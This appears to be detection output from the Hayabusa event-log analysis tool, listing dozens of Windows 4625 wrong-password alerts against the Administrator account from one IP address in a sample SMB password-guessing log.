NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g6Tpp8TRa2nRxHzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DyLvo5Bn2HzyANdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.465 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaXNThuZDGqJ7oCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 42Sb7p19cQsEV30b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: An6629wgflzSgqY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iO7JktEihqddmEtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nG97BFOgKxnZaqi4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SH2D24c6nRGDL4Oe | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiu2yfaM2JQQZoLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YQx9PG8DtR2tMjvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OoAWryajKhLD7RyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgewSeaVugP1TXss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPMCPdCAnz4upz8X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.956 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dUbV6xnGeBWE8Dif | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIJ9mZczFO1GKItV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wW0vxE4o68L70Sra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOn9DzB1yWtntyX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m9uGgocAVReiJWDm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qm9Jf1fles2HOb3g | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ev5eTWdf3CskOMuh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoiMO6sSLOm4fOD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDjvMsa2IgR9KO7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SR7gVjxHZDYeK7pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4jzGAepr7JeNKuuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.368 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H9baxEeRCWjx6Fzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uy7aTt0B4ErguacA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvKcLrUXqu2vTKO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLycXLeAU21pdnXL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgwjJSKOPnurDWW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPDYdxPoQAl8aGMs | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CX8knunlT6SMpmQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAjYbt50leZt3Xve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CD0HUCdg4UWOiji | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dkeWmTE1R1rYaYP8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W87qcfSj4qWWUv4k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.830 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WUCyUQgbUqwaLj3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9nLhDbcvmVBZp4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBWo1zDdjaAeGDWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjHRFk2flmzzd1zg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 53HYxs9s7fpP1y6V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tluqXKvVooP7VNyB | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43m0nfi5tiv4TpSB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qjPyJXl984vViV6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MomQ8Yt51VsMiO4p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LJYCi5r2otMHxA8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4oUSkMBI8SGDLwYC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.251 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j1x3lyRjxn73KITB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh05BhGpwq1ho62a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxj6ITbiciyRNLbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uev2mjCaqHjm6NYi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L4WU383o9E5JyM5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfMv0lsoiRnTCFXe | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL4ahBqUyGeTONkE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8hJ888Kmyi6KqIPn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VZ6sfYMHuygnMdY2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XkuSlyTNc5OOoUtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Z13YmupcMato8Sd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.733 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JedeMnLPnRJEwhZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmy0c0wFheIRzSo4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sskKdqku5S0f1sWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 15Qg0nCXNj7Ub1Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZD6iuaqv70k69G87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gk3UuqTJmvH1snmN | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaw9iF5mJlyygdnB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Sr5PZAd1qMc7hi3c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l5xbQtyueVq3fJSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g2nP0zz2ofBxTGw6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SYJheREJmEwj0791 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.277 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: exglD9fnLwaqwRZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bSAU1QjasDAsmry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cfnrtXR7evQBbaOw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYAwjW99chcntPsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rG2PYfOTfT7QvbPu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FojDtfDNXq0gQfYu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
